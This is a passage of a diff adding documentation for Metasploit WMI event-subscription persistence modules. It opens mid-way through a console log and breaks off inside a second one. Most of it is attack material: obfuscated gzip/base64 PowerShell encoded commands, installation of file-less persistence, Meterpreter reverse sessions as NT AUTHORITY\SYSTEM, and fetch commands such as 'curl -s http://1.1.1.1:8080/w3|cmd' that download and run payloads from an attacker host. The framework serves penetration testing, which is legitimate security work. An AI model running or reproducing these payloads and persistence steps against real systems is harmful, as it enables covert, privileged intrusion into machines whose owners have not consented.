 v L G N f V 0 a D 5 j f 0 z h 0 S n 4 S 3 x 0 x G u { 2 } H L V 5 + y H y M t W R v f 3 5 G P M w 1 ' + ' r s X + E g B D s Q 6 e M P 7 q { 1 } t z r T v P t 2 r q e Y ' + ' x ' + ' H 6 s t 5 b l b 1 8 V K h / w M 4 u K Y u j T z n S j 2 H J F + E i 1 P y + 8 b x 2 c 9 f w L O G P B 2 R Z z ' + ' P 6 H t 0 z M z 9 v Y / 0 a U V + { 2 } c X B e x r x Z 4 b c M v t z j O f m r + F j 0 8 b 7 { 1 } I m / Y U e e l 5 9 z 9 S 8 O 5 z p M d d S s 1 / j j + H E e Z 6 4 l x a O u 5 I 7 g V 8 1 z 2 v e 3 5 s e e e G + N 2 x f q 1 f 3 u u F u L c N f L X p e t e K X n k n 2 U Z 5 0 4 l e T z 0 P O j W / Y f n d Y 7 H V 3 j R m ' + ' v k J d i j j v K t q I 3 + b U 0 d ' + ' z 9 { 1 } s / 3 H g O c a { 1 } 3 5 n 0 r 5 h I Z c U Q 8 H v G j + 8 I { 2 } v { 1 } d c 5 r l 9 H 6 j 8 2 Y d Y Z 9 R n l z y X r j / M E y K / 2 5 h n F M g 5 M 6 / y H O S q x / c K v 1 b Y 8 8 5 9 W Q X e / 6 R O 1 N Q P 1 c c K u 8 J b + n n 4 E h y g z 4 M P x j p w Y f 4 F X 8 T O z A l O d { ' + ' 1 } l z G / t 1 y x w t c 5 / v e c y { 2 } f k 3 + W h D n { 1 } 9 / m x d T 9 4 a + + s H L f Z P ' + ' 4 6 J { 2 } 4 8 x 2 M / f I B + g f i Q X K X n r Q V 4 d p r H v 7 h / 8 t y 4 i 7 w t y 2 I f D B 6 S 5 9 J 7 A v 6 M q G P 8 3 3 M z 1 2 X P L b R + A 9 6 O H G 8 v + G 3 S x X x r + u 8 a U 8 e p + 1 3 P f R r P 1 w 7 g 3 P v Y 9 8 t u z D n P c w f l n ' + ' e J j { 2 } ' + ' U 4 y f z Z f v i L e r / B T A 4 7 r / z v 4 J / M O / K Y 4 3 p / z D P 3 N t 3 5 i h z X n 5 J 5 j d N S j p e f a x 7 N d l P + u P + c + 2 P y l J B 9 H 4 E u c Q 5 i f X h q f z A d a 9 P 7 E s 3 S c f I y 4 n D I v l b 6 Z 5 9 d X y O f 5 r v b v m T P I b t M Q + c 0 t c 7 v c / Y D z Z R l i n 6 z 4 v Y t z D e p I Q 9 0 a Y L d Y R 8 1 v 5 + Z n n q 9 5 b l c T N w v P z Q / 0 F Y M 4 F 8 O v 1 G P 2 e a 5 x j z 2 3 5 s f u N 4 f n P J F 9 Z Z + J 5 5 9 t j K e a f M z 9 n e e G / e a L k q s k z 8 B P x 3 H A 3 5 5 H 3 / n / V + D { 1 } F 3 5 X 5 A 1 z I 7 4 v k Z f u l 2 r 8 + N z H R 4 0 / a 3 A 9 9 g u e y 6 x 6 X N m S X / A 0 1 x 3 3 r / / n + 0 R w v 7 L w f K 8 h L + y X t e c 6 B f L k r K + x J 3 N 7 7 h s y z 4 8 8 c W W ' + ' e + B j r S + w 7 v / R y d v 3 3 G f N ' + ' Z 9 9 O y x x w / j c y L P v V x / g n e M z X P e q R e d u S D e N e z + 0 T m R H n f x 0 v v j X m R + 0 d / x 5 h 0 c R 6 z M S 6 5 f z a e L U P s B y f k X 3 b s 5 2 0 t 9 / p 7 1 t J 1 j T r F e u b i 9 M k Z / Y L 5 3 b y M 8 5 0 d 8 w T 5 v w D P U 9 / n P m x N P M R + 5 s T L z f d 3 4 I F w b 0 J c g q / + H t O A d 7 O + j 7 8 3 D 7 K / m z P + T D 2 X q 9 F r 6 L p M f Z E d r W / q 7 5 i e 1 z a e M ' + ' 3 r e e 0 X 8 7 8 z H y Y N g P r B B r u G v f n I Z 4 v e f X R n 1 2 M L H Z b c F d T t + Z / j a z 5 s u 3 S c Q l 7 m / S 9 z b z p 6 P 1 J E v K + 7 3 z F 9 G 1 M F w 2 e P g B / J m 3 u P u l P { 1 } p u x s f R / R n c Y 6 / N t 6 P 4 3 c T 5 w X r 7 G / z y S n 7 t V 4 4 4 t 9 1 d / 6 u 9 M n z W / A l 8 n L b p y 7 7 v g 2 c 0 P 8 n ' + ' 7 r e N J w / 2 s / n H L 7 z f l Z E f L Y 1 7 W e Q H 8 N Q y e J 5 Q d H G O W D I / U T 6 5 3 p z r H 3 3 S b 9 / z d H / B / A B c Z a 6 Q W b 9 R 1 I O 5 { 2 } P 1 i 5 P 8 F f U V m v V 2 3 K n 8 H r + N 8 N P e 8 3 H O 1 m n p E n 4 c 8 2 N N x 2 Y V 3 / / i P d 9 X j / u H d f / 0 v l I + h { 2 } 4 E f A A A { 0 } ' ) - f ' = ' , ' o ' , ' C ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] - Bytes remaining: 6384 +[+] EXECUTING: +powershell.exe -EncodedCommand & ( [ s c r i p t b l o c k ] : : c r e a t e ( ( N e w - O b j e c t   S y s t e m . I O . S t r e a m R e a d e r ( N e w - O b j e c t   S y s t e m . I O . C o m p r e s s i o n . G z i p S t r e a m ( ( N e w - O b j e c t   S y s t e m . I O . M e m o r y S t r e a m ( , [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ( ( ' H 4 s I A L q m H 2 k C A 4 W Y S 3 P b S B K E / 8 r e v B s x B 0 q i P N q J m E N B A B + W S B { 2 ' + ' } k I Z r c 2 A N f p m 1 a p i 3 K g u R f v / l l g 6 O 5 r S 4 M { 1 } O j u e m R l Z f V / i m 9 P n x 8 O 3 + 6 3 3 x 7 / + 8 c f k + 3 j 3 1 7 c L R 8 + L 1 d f t / 9 8 0 9 L f e f X x 6 X F 5 K L p v f n t z U 0 c r i n a s y u w m 8 n 3 c 1 t k 8 i n X c 1 ' + ' F k W v T n v j 9 G Z x 7 C M h 8 j L m E a 8 R O c { 1 } W 3 6 L V k z q b B D X V 7 H e Z c P { 2 } R A w j W 0 Z n F + s y e 4 j u I E Z l 9 j W K I k r W d / w 8 i 2 K n / b I q 8 l 2 ' + ' 8 q / X + e s 2 6 f n { 1 } P 2 j + 7 Z F + d O 2 H 9 q s 4 K 7 F q X U U e n i F F k P 9 l / U W d 7 z t M 5 e X T n U d V 6 3 + 3 H s N Y + R R 3 z U u t 6 / V j s d L 7 2 2 e 7 0 v f 6 / 2 W V 1 X B 9 j E 9 k 4 u v ' + ' u Y 7 + J X s 8 / X 6 J V R l V q v d Y M 6 + x V F G Y s y a / N c R ' + ' f a W 7 / S + J A 4 T f m X v p s x + j 7 w f H 8 u 4 J A 7 y s 4 2 9 E / y S H S P i { 2 } D j O 8 C e v Y r V T f L ' + ' p l r E N x 0 H m z y L q O T 6 1 1 s k t x f Y r u V S w j u 2 e / u x r 7 f d 7 n K P { 2 } x r b M D 8 Z M 9 b f b d 1 s p D r 4 U f D 9 i r 5 2 e e F 9 i n 9 d W O O N ' + ' b 4 Z / u G P r d S v l i n + I T s 7 u w V J + L L s + w j P z v l p / ' + ' u 3 / O y y T 5 H P Y 1 B m 3 6 L b 5 n d I 3 K d l d h H d I i a B 3 0 H + n l m v e B + I 1 4 g 4 y y / l 4 d r n 8 H 3 v 0 P i 5 J l 8 1 + D I u 9 L 3 i + R n / V 8 7 H W n 7 K v m L O + u / k S / a e R b 5 m / 7 f ' + ' R K 7 { 1 } P e T i y z 4 ' + ' R 4 6 v k 8 e g P i d I 5 d s v u M c 2 Y 7 f S d c C d 8 X 4 H c { ' + ' 1 } w q 3 w d 4 r X 1 P a ' + ' U 2 P t E X I a c q / 1 0 7 n 3 0 j j H Y Z f 9 O + Z F / H f K W 8 r v c k b + S u N a R G 2 c l d ' + ' i n u B X U 1 L r V v X q X 6 K N h f z 8 L x H f h V X ' + ' s Z 8 r 7 h t y Z / i I 3 y 2 w b d w 9 k h 8 7 / h e c V h S H 7 0 d 9 k + J x 7 L U e c r / u { 2 } 5 ' + ' z 8 D g O 4 T j V T 8 2 5 k 8 h G U { 1 } y w 9 4 x 8 C + + f e F 7 t 5 F e 3 R V z 6 9 q u U X 7 J L P H B B / j e l 4 l E c 8 L f E n 5 X r r A A f v 1 x f O / G E 8 j e s q Z u C v F 1 g h / J 2 a z + x 9 x r + i G / U u 3 D 6 P T r k C 5 w V + D X h / Y Y 6 U f ' + ' z k z y V 5 U j 4 y 6 m Z M X { 2 } X T s X l p D k 7 1 / 0 r v Z V 9 R k Y 8 9 + 8 n / D + D h l j g R T / w + + a P 4 3 Z F X x W V D / { 2 } T X s i Y O J X h 1 / r T + H p y Y l x S P F f 4 q / s r j n v M U x 1 + 8 H x s P w f + n + K n / 5 9 i 3 M H ' + ' 8 c O H 8 S x R W / P 8 D T 0 r x W E q d 7 1 { 2 } 3 A k f h B e Z i D 0 x n v 5 b / i d 4 m d s q u D 3 x v w J N y L x 5 6 I v 7 4 / 8 n 5 J / { 1 } u P q i ' + ' / l 9 R g T 8 J x T F 6 r D P B K e 8 g L 7 c v I 3 K s P 4 v + N c 4 X 5 D X S f 7 + t i v + P / O 9 x 9 L x U 3 x X ' + ' 5 g P m 3 w J / 4 p j j 3 X u C 8 K f 8 n I w X 5 J v x V v 2 t 8 D j i R c G 1 J / q 9 4 a 6 E l 6 E u w f W n X j p 9 J ' + ' 3 q u e S 9 6 u a C c 7 T / E 7 y 8 c b z X 5 G 2 P X 8 L T W / C 6 b P h s R L 2 d 8 i r 8 j + A H 4 W C + y 7 6 w z x j / 9 d 2 E 7 x S P W / O J + 8 S H h N + E 6 5 l x p H 3 g W f J Y K 1 7 K 0 6 C U 3 / L v X S 2 c 9 v b U 8 3 m y S 3 E T X t b m 3 z n 9 5 B z + 0 7 m / w N + G u A j v N + R R v C K c f e Z 5 b r 8 O + p 7 z 2 s K B 4 k g / C O F R + F q W q a 5 U / + 4 n a / q b z l d 9 / 2 D / N f W i X 6 0 z T y R e 3 Y O n g / s a P H x t v n v b 4 K / N v q c 4 y 4 4 L 6 t 8 8 L J x O 4 P n c 9 d L k X f y p O E 7 h J + { 2 } Y n q V P c I 7 6 / p { 1 } + e s K D z j P f y d 4 5 f T H x U p v 6 U b 4 r 7 N / C x 7 J z B t 5 k V 1 m m u M 6 J h / K 6 A I 8 d 5 ' + ' / / e f R p + { 1 } 0 f A i 6 k f / 0 j x T / Z X 9 J W / 8 D i n b ' + ' 7 0 3 / l i f u / 9 e N P 1 6 y v 9 X 6 A H H I + F g 6 3 7 X V x 7 { 1 } G S V 1 + h X 7 1 s S z 8 H 4 d 8 D U m P + A t s h f w P O b / q p s x + C z M t 2 3 y q u 9 / 0 A e H 4 A L + L 6 m L P X H 6 { 1 } r 0 u 6 N O q y x n 1 q D q { 2 } y D P 1 D l / S B 6 K x 2 + / X 5 M N 5 V f w v w b H 7 j P I i f 8 / A 6 R K c 8 n 6 n f H T d F 6 / 5 1 T k 3 7 K d 8 L 8 i D f r s N H 5 5 z r v T F { 2 } d F h G f G Z 0 h d O c R T e F Y 9 b 9 l c + O + R T c R 6 B z x V 8 R p 3 w 7 P X Y W a G 3 X A d 3 x n W h e C n e + s 7 v h Z 8 N / g t n N / C e c D I w z 5 b w w T P 5 n t J f F K 8 x v J e 7 D z w T X 9 X X z 6 { 1 } b 4 Z M 1 v H V 0 X 0 G v { 2 } a 9 2 S c 9 p / + c G b x 3 s m s O L K d 7 W q R X 1 2 D s 0 d W k 9 c 0 F + b 6 n 3 h N u D + S 7 S e v 0 u G t 3 y H X 0 y c H 1 e w X f f / 4 p T T l 6 S j j v x ' + ' V 4 V + l B 8 r f n u O 2 x E + H h k n h y i J v / T b 2 L q U e { 2 ' + ' } b H S + p g a L 2 F f x 1 4 K / G 9 + 4 9 w M C w T H { 2 } f ' + ' 0 T / { 1 } P / S T f J z ' + ' 2 m e M 3 { 1 } X + Z d 9 n X 9 X u K v 8 S F / N 6 4 z 9 7 0 J 3 0 3 { 2 } / 9 a f ' + ' 4 j 3 5 r f j f u k + h 4 7 v m / a X 1 l ' + ' H W { 1 } c T V l f W X c F + C 1 T V y m 9 E 3 x S { 2 } U u T f P A D b y { 2 } d Y M m D t d + p q 7 M C / j R p z 9 c 4 N + E u S D x 5 a 3 1 I X p e 3 6 m e T j q 5 R Z 8 c U h + q M / U / 9 0 P x S ' + ' I u 8 K V 6 P 2 D 1 r 6 m K D v i L / 5 F f + r 6 x n 0 J 2 K s / x Z w N P C k f j m B R 0 x { 1 } 0 c S p + b / K / J D 3 w A H y p f 8 d h + e g t f c / P S A f c L x J + x y f B R f 4 f C Z e n E d 5 d 6 n h R 0 b + L 9 L f S p + y t u J t + 7 I k + K 3 { 2 } J + J d 9 b u X 1 d J V / U 4 F z u t y 3 ' + ' 5 a 5 0 R T b 9 R x 0 r N n x H 2 B v / J v i V 7 M z W / 3 5 G e I 7 h P u 1 v B E d 5 7 0 9 D V 6 { 1 } v v m n t f c D / 7 q A 7 X w R D 2 h Y 0 7 6 t Y D v 0 { 1 } P { 2 } H / r C P v F x 6 t f W w ' + ' c K P 9 x f e P u G n 8 ' + ' O ' + ' H 4 T d H V 6 N T T f B G J F 6 b W n V f s e 8 l 5 N / U p z 2 k + G H t O G p C f M f 6 M y t T n x k 0 d S 0 9 V 5 H 2 F n l V f c d x 7 n q t a ' + ' 1 ' + ' k m u i x 1 z w 9 7 6 C n 3 Y M R 9 + S P q Y e a p O f U n x W a E j h U 8 9 f 8 C + t X V d S T x y 4 j O g b r X P j L 5 l P g c f { 1 } b 9 v p / + n v i j c v 1 j / 1 2 G d v e U c + a + 4 f E m 6 k r w 2 c c 3 d d 5 7 p E z N w D O 9 Y 9 1 s 3 3 s P T U 3 i m 5 7 y 9 t / 3 w d e 7 n i 9 d + 1 + d 8 z 8 U T d J j i M 8 V + 2 T m n f l N / e Y F v V t R r 7 j m 7 w l 7 3 0 x 7 8 p z p N 8 X O f H J u P z K 9 H 7 P S c p 7 r z H N F 7 7 b v J j z m 6 x n { 2 } 8 1 f c 6 6 R D l Z w N v a j / X n / p f O h 9 7 d B 5 4 I V 7 U D f v l 5 s N z e E Z 4 G P k 9 O B a e J u D t 2 r x 7 5 H d p + 6 x b H { 2 } 1 3 5 g v 5 e + N 5 z v P j Z a M z L j ' + ' 2 X U F + 5 + 1 u b P r q p U x x ' + ' X x q F 5 d M a 6 R Z 1 4 d N P g a U B e 4 N X G 3 j v P R y 1 4 t m v 9 g G 5 A b 3 I P k v j x s + N s H j G O X u D h t e t g n + Y t 8 Y v 1 p P A 3 t a 7 i / i E e E t / S P x r d m v R b n z p x n x Y P L O k n 1 v l h f T X A H u W z 9 P y I j l f d 5 u 4 b v / B n 6 / m 3 D a 7 7 z T z j u l J + z { 2 } j P z P V { 1 } 4 f 9 b c C i 8 D Z v n 1 / k 1 f 6 3 z I f c b v U O 6 R y B / I V z 2 r N s m a U 4 h v k G c T v P C T + t E 5 s E e 9 w W s 6 x O X C n s 9 B 6 n u Z 5 6 b C u r W / D S l 7 8 q P F T r U 8 w n 6 d M d 9 R r v J 4 1 P K e 7 z O I e q z C ' + ' + 5 J w B 9 5 h M c d 1 x 1 9 p b b u 2 6 G D X u 8 7 S s / P 8 z S X 6 j z r q e 4 + 6 T f y T n 0 w 3 5 X ' + ' K f 2 f f 6 A T f 8 3 y D 3 9 b E I U c H g u 8 2 d T f j e d 7 c I w z { 1 } y 1 3 u F 5 h 7 3 c e / N N 8 V P M / I b + r L D 6 7 H S H P A i H r u { 2 } Y v + N h e n v n Z g 3 w 2 6 U f F b g u s O 9 q { 1 } 5 e 4 C f 7 i P q V 5 1 B c 4 / F / E S f g y e p W + q H u m Z + A i d 7 9 j / n / Z S + 7 b m d e W W f 5 i 3 l 0 / q T + D W 6 a l O f 5 p + w 3 l X d v f f 8 { 1 } x y S b j G f 3 d V p X U V c c 9 / v f M G v { 2 } f U z 9 x D E r 9 / { 2 } { 2 } a v U X 3 u e E / { 2 } N f 3 { 2 } + G n p u 6 J O / h 6 R T u f e B r 5 g L f T 9 4 p O 6 E y 0 f s W n t u a K U 5 l f W + x z r d L 1 j X 3 F N H S + 4 F 8 t d + b H 3 l / g 5 f c y / B H H D g t 2 z m + P f N f H W J P X f w c h f + k s 4 U X h b E w f c 8 3 G 8 M O P e R O v e 9 B b i z T n b d P S Z 9 k O b s B X E p j P + J 5 6 t X 3 f O E v b f U n X k z 3 f d V k f J m P k 3 6 q Y 0 / U / R r t 0 p x 6 Y E v ' + ' / C m J X 7 v R Y S / s v 2 A + z e l f w n n P v H 7 q v / t G z / x s 9 M F 9 { 2 } 9 d b 4 C 7 p u i L d e 3 h O T X p 6 s U v 3 e C f 9 a 7 0 E n i L 1 v S 1 9 n H w y l y l / p 3 i P u b + g r 9 e J N 8 z 3 O X N Y + B 5 4 2 d x v O M 7 X n p c S / z N 3 0 O c i 3 d N s m j k 9 4 c / z v / G 8 d R 1 4 P p 0 3 5 3 u e n J r / P F 9 8 c v z R t e C v u ' + ' S c c s X / H 8 8 { 1 } Z / l u n { 2 } H / q h F P Z 8 8 { 1 } 8 u K X e r V f C f X P L n M 4 8 H G n e u 0 X f 6 T v H z T w j P C t + 1 q G F + X T u + v d 9 Z B / 8 f 3 j t 6 2 1 4 { 2 } c / + N / B N l 3 s D v s c + z j P P / E j z Y e { 2 } P W 3 C ' + ' H 3 u C 5 N 0 j 3 R s q n 5 r D U h 9 z v g 7 x l z b y R g b ' + ' u t 9 Y r v X T T X U D f w j Z + P 2 D P x f U f N f c e d 7 S v 5 b s + v 5 p { 1 } j / H 7 J e R v q R X V 3 u 8 v e + f 7 I c 9 l V 0 m n c G 9 O f m O d K 5 r L 2 / / 3 / 1 L + + T 9 9 E L l 4 0 n 1 b N X N e i L l 9 4 X l M f y R 7 Z 1 U 7 z l / C 6 g E e 1 / 5 g + x P 1 R n O x O 9 / t ' + ' L 7 u m u w S N 8 Z x ' + ' 7 2 f Y n e e 6 6 { 1 } / 7 9 H / P n n m 9 / + 8 a Y 6 b h / e / O t / g n 8 6 { 1 } j E Z A A A { 0 } ' ) - f ' = ' , ' Q ' , ' o ' ) ) ) ) , [ S y s t e m . I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ) )  -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcQBtAEgAMgBrAEMAQQA0ADIATwBNAFEAdgBDAE0AQgBTAEUALwAwAHEASABTAEYATwAwAG4AYwBTAGgANABxAEwARQA0AHUAUgBRADYAMQBKAEUAWQBuADEASwBiAFAAbwBpAFMAUQBnAHQAMQB2ADkAdQBpAGcAJwArACcAcQBPACcAKwAnAHYAdQBsADQAZAAzAHgAMwBKAFUATQBuAHQATQBJAEcAMABCADcAUwBOAEEAUAA3ADgAOQBoAHoATABmAGgASgBnAHEARgBoAFkAVQBDAEgAVQBWAEoARABaAC8AbwBjAEoARgBRADIAegBxADAAewAyAH0AZQBBADIASwBpADcATgBjAHMAYQB6AFAAbABiAGIAeAA5AG4AVAB6AFgAewAxAH0AOQA2AEUATgAnACsAJwBtAE4ARgArAFUALwBkAEUAcQBPAGsAdwAvAC8ATwBkACsAZwBVAHoAWABFAHIATAAxAHIATQBFAFkAbwBEAEEAZwBsAHQATgB4AEIAYQB4AE8ARwBsAFQAcgA3AFMAawA4AHEAVQBIAGcATgBpAFMAZQArAFoAdwB7ADAAfQBoAGwAVQBJAEgAZQBpAGgAYQBhADkAVQBzAHUAWQBIAFoAOQBPAHYASwBMAGgAcgB1AEIAYgB3AFoAcQBnAEQAdgBBAEEAQQBBACcAKQAtAGYAJwB5ACcALAAnAGoAJwAsACcAVwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcQBtAEgAMgBrAEMAQQA0ADIATwBNAFEAdgBDAE0AQgBTAEUALwAwAHEASABTAEYATwAwAG4AYwBTAGgANABxAEwARQA0AHUAUgBRADYAMQBKAEUAWQBuADEASwBiAFAAbwBpAFMAUQBnAHQAMQB2ADkAdQBpAGcAJwArACcAcQBPACcAKwAnAHYAdQBsADQAZAAzAHgAMwBKAFUATQBuAHQATQBJAEcAMABCADcAUwBOAEEAUAA3ADgAOQBoAHoATABmAGgASgBnAHEARgBoAFkAVQBDAEgAVQBWAEoARABaAC8AbwBjAEoARgBRADIAegBxADAAewAyAH0AZQBBADIASwBpADcATgBjAHMAYQB6AFAAbABiAGIAeAA5AG4AVAB6AFgAewAxAH0AOQA2AEUATgAnACsAJwBtAE4ARgArAFUALwBkAEUAcQBPAGsAdwAvAC8ATwBkACsAZwBVAHoAWABFAHIATAAxAHIATQBFAFkAbwBEAEEAZwBsAHQATgB4AEIAYQB4AE8ARwBsAFQAcgA3AFMAawA4AHEAVQBIAGcATgBpAFMAZQArAFoAdwB7ADAAfQBoAGwAVQBJAEgAZQBpAGgAYQBhADkAVQBzAHUAWQBIAFoAOQBPAHYASwBMAGgAcgB1AEIAYgB3AFoAcQBnAEQAdgBBAEEAQQBBACcAKQAtAGYAJwB5ACcALAAnAGoAJwAsACcAVwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None +[+] Cleaning up 4248 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwANgBtAEgAMgBrAEMAQQA0AHQAJwArACcAMgB6AFMAdgBMAEwATQByAFAAeQAwAHsAMAB9AE4ASwA0AG0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAcwB4AEwAVgB3AGgATgAnACsAJwBLAHkAdABKAHoASABkADEAcgAxAEcAdABqAGsAWQAxAEwAQgBpAHIAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUATwBUAHAAUQBRADIAcwBCAHsAMQB9ACsALwBDADgAbwBRAEEAQQBBAEEAPQAnACkALQBmACcAMwAnACwAJwBXACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBzAFUAdQBoAEwAaAB0AEwAJwA7AA== -InputFormat None +[+] Persistence installed! Callback should be in: 30m +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251120.3942/WIN10PROLICENSE_20251120.3942.rc +[*] Sending stage (188998 bytes) to 1.1.1.1 +[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:50541) at 2025-11-20 18:40:45 -0500 +[*] Sending stage (188998 bytes) to 1.1.1.1 +[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:50543) at 2025-11-20 18:41:44 -0500 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md new file mode 100644 index 0000000000000..e4ae346b5c8f9 --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md @@ -0,0 +1,144 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter +that triggers the payload when the specified process is started. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_process` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### PROCESS_TRIGGER + +The process name to trigger the payload. Default: `CALC.EXE` + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49758) at 2025-11-22 11:28:54 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +gComputer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 